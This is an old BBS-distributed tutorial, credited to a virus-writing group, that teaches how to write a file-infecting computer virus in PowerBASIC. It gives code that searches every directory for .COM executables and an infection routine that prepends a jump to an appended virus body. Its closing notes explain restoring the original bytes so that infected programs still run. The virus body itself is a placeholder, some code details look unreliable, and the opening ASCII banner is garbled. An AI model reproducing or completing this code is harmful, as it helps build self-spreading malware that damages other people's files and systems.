ллллллл л л ллллллллл л лллллллл л л л л л ллл лл л л л л л л лл ллллллллллл л л л л л л л л л л л л л л л л л л лллллл ллллллллл л лллллллл ллллллл л л ллллл л л ллллл л л л л л л л л лл л л л л л л л л л ллллл л л л л л л л л л л л л л л л л л ллллллллл л л л л л л л л л л лл л л л ллллл ллллллл лллллл л л л л л л лллллл Distributed By The American Virus Creation and Research Society ФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФ Virus Creation in PowerBASIC Finding The Files: chdir "C:\" ' Change Dir to root directory dim subdirnum(100) ' Dim the variable subdirnum level=0 fdfil: AA$=DIR$("*.COM",0) ' Find the first COM file in curdir IF AA$="" THEN GOTO CHDR ' None then find new dir GOTO infect ' Goto infection routine FDCOM: AA$=DIR$ ' The next four lines are our loop IF AA$="" THEN GOTO CHDR ' to find all COM files in curdir GOTO infect ' for infection. GOTO fdcom ' infect: ' Your infection routine CHDR: ' Where you find next dir bb$=dir$("*.*",16) ' Find first subdirectory incr level ' Level+1 incr subdirnum(level) ' Subdirnum(level)+1 zzz: if (bb$<>"") then ' If there are no subdirs if (attrib(bb$)<>16) then ' If file is not a subdir bb$=dir$ ' Find next subdir in curdir goto zzz end if end if if bb$="" then ' If no more files decr subdirnum(level) ' Subdirnum(level)-1 decr level ' Level-1 decr level ' Level-1 if level<0 then goto finish ' Done with root directory level2=level ' Assign level2 to level chdir ".." ' Back one directory if level=0 then ' If we are at root for level=2 to 100 ' 2 to 100 subdirnum(level)=0 ' Zero out subdirnum(level) next level=level2 ' Assign level to level2 end if goto chdr ' Goto CHDR end if for j=1 to subdirnum(level)-1 zz: bb$=dir$ ' Find next file if (bb$<>"") then ' If there is no file if (attrib(bb$)<>16) then goto zz ' If it is not a subdirectory end if next if bb$="" then ' If no file exists decr subdirnum(level) ' Subdirnum(level)-1 decr level ' Level-1 decr level ' Level-1 if level<0 then goto finish ' If we are done level2=level ' Assign LEVEL2 to LEVEL chdir ".." ' Back one directory if level=0 then ' If we are at root directory for level=2 to 100 ' INCR level 2 to 100 subdirnum(level)=0 ' Zero it out next level=level2 ' Assign level to level2 end if goto chdr ' Find new dir end if chdir bb$ ' Change directory GOTO fdfil ' Find all filespecs in curdir FINISH: ' No more subdirs STOP ' End the program Infection Routine: OPEN "PROGRAM.COM" FOR BINARY AS #1 ' Open the file to be infected. LOC1: GET$ #1,1,A$ ' Get first byte and put into A$. IF EOF(1) THEN GOTO LOC2 ' If EOF then goto LOC2. B??=B??+1 ' B?? is used as a counter. GOTO LOC1 ' Loop until the EOF. LOC2: CLOSE #1 ' Close the file to be infected. OPEN "PROGRAM.COM" FOR BINARY AS #1 ' Reopen the file to be infected. ' This clears the GET$ "buffer". OPEN "PROGRAM2.COM" FOR BINARY AS #2 ' This is going to be a copy of the ' file to be infected with the virus ' contained in it. GET$ #1,3,C$ ' Get the first 3 BYTES of file #1. PUT$ #2,CHR$(&B1101001) ' Put a 1 BYTE jump statement in file ' #2. ASM MOV AX,B?? ' Move the file #1 size into the AX ' register. ASM MOV D?,AH ' Put the high 8 bits in D?. ASM MOV E?,AL ' Put the low 8 bits in E?. D$=CHR$(D?) ' Turn D? into a string. E$=CHR$(E?) ' Turn E? into a string PUT$ #2,D$ ' Finish the jump statement with the PUT$ #2,E$ ' 2 BYTE address. CK: GET$ #1,1,G$ ' The first file is now copied IF EOF(1) THEN GOTO CK2 ' to the second, virused, file. PUT$ #2,G$ ' Notice we start at the fourth GOTO CK ' BYTE, because the first three are ' a jump to the virus. CK2: VIR$="MAIN VIRUS" ' Here is the virus. CLOSE #1 ' We are done here. PUT$ #2,C$ ' Put the three BYTES from the BF at ' the EOF. PUT$ #2,VIR$ ' Put the main virus in file #2 CLOSE #2 ' We are done here. Note: You must return the first three BYTES taken from the original file to their proper position in memory when the COM file is executed or it will not execute correctly! Observe: [JMP VIR] [PROGRAM] [3 BYTES F/BEGIN] [VIR] [RESTORE 3 BYTES] [JMP BEGIN] 3 BYTES B?? BYTES 3 BYTES X BYTES X BYTES MUST CHANGE TO [3 BYTES F/BEGIN] [PROGRAM] [END OF PROGRAM] [VIRUS] In memory, this happens after the virus is addressed and before the program is addressed. If you have any questions on the subject of PowerBASIC and viruses then you can either Email me on The Gallows Pole BBS or write to the central P.O. Box for the BBS and the virus group, all of which are listed in the INDEX file. W-B: MAS